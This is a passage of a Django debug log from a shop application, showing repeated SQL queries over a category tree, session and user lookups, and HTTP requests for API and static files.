DEBUG 2019-12-13 13:50:17,832 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:50:17,834 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:50:17,837 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:50:17,839 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:50:17,841 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:50:17,844 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:50:17,846 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:50:17,848 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:50:17,851 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:50:17,853 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-13 13:50:17,886 utils 19639 139877756696320 (0.002) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:50:17.882955+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 13, 13, 50, 17, 882955, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-13 13:50:18,054 utils 19639 139877756696320 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:50:18.051262+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 50, 18, 51262, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [13/Dec/2019 13:50:18] "GET /api/v1/categories/ HTTP/1.0" 200 49536 [13/Dec/2019 13:50:18] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [13/Dec/2019 13:50:18] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [13/Dec/2019 13:50:18] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [13/Dec/2019 13:50:18] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [13/Dec/2019 13:50:18] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 [13/Dec/2019 13:50:18] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [13/Dec/2019 13:50:18] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [13/Dec/2019 13:50:18] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [13/Dec/2019 13:50:18] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [13/Dec/2019 13:50:18] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [13/Dec/2019 13:50:19] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 DEBUG 2019-12-13 13:51:12,599 utils 19639 139877846468352 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:51:12.584845+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 51, 12, 584845, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:51:12,605 utils 19639 139877846468352 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:51:12,611 utils 19639 139877846468352 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:51:12,613 utils 19639 139877846468352 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:51:12,622 utils 19639 139877846468352 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 13:51:12,810 utils 19639 139877846468352 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:51:12.807756+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 51, 12, 807756, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:51:12] "GET /shop/category/ HTTP/1.0" 200 15719 DEBUG 2019-12-13 13:51:13,113 utils 19639 139877846468352 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:51:13.104051+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 51, 13, 104051, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:51:13,116 utils 19639 139877846468352 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:51:13] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 13:53:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 13:55:21,731 utils 19639 139877846468352 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:55:21,738 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:55:21,741 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:55:21,743 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:55:21,747 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:55:21,749 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:55:21,751 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:55:21,754 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:55:21,758 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:55:21,764 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:55:21,768 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:55:21,772 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:55:21,776 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:55:21,778 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:55:21,782 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:55:21,785 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:55:21,787 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:55:21,791 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:55:21,794 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:55:21,800 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:55:21,810 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:55:21,813 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:55:21,815 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:55:21,819 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:55:21,820 utils 19639 139877735716608 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:55:21,825 utils 19639 139877846468352 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:55:21,828 utils 19639 139877735716608 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:55:21,831 utils 19639 139877846468352 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:55:21,834 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) [13/Dec/2019 13:55:21] "GET /api/v1/categories/10 HTTP/1.0" 200 336 DEBUG 2019-12-13 13:55:21,839 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:55:21,844 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:55:21,849 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:55:21,855 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:55:21,859 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:55:21,862 utils 19639 139877846468352 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:55:21,866 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:55:21,870 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:55:21,876 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:55:21,880 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:55:21,884 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:55:21,888 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:55:21,892 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 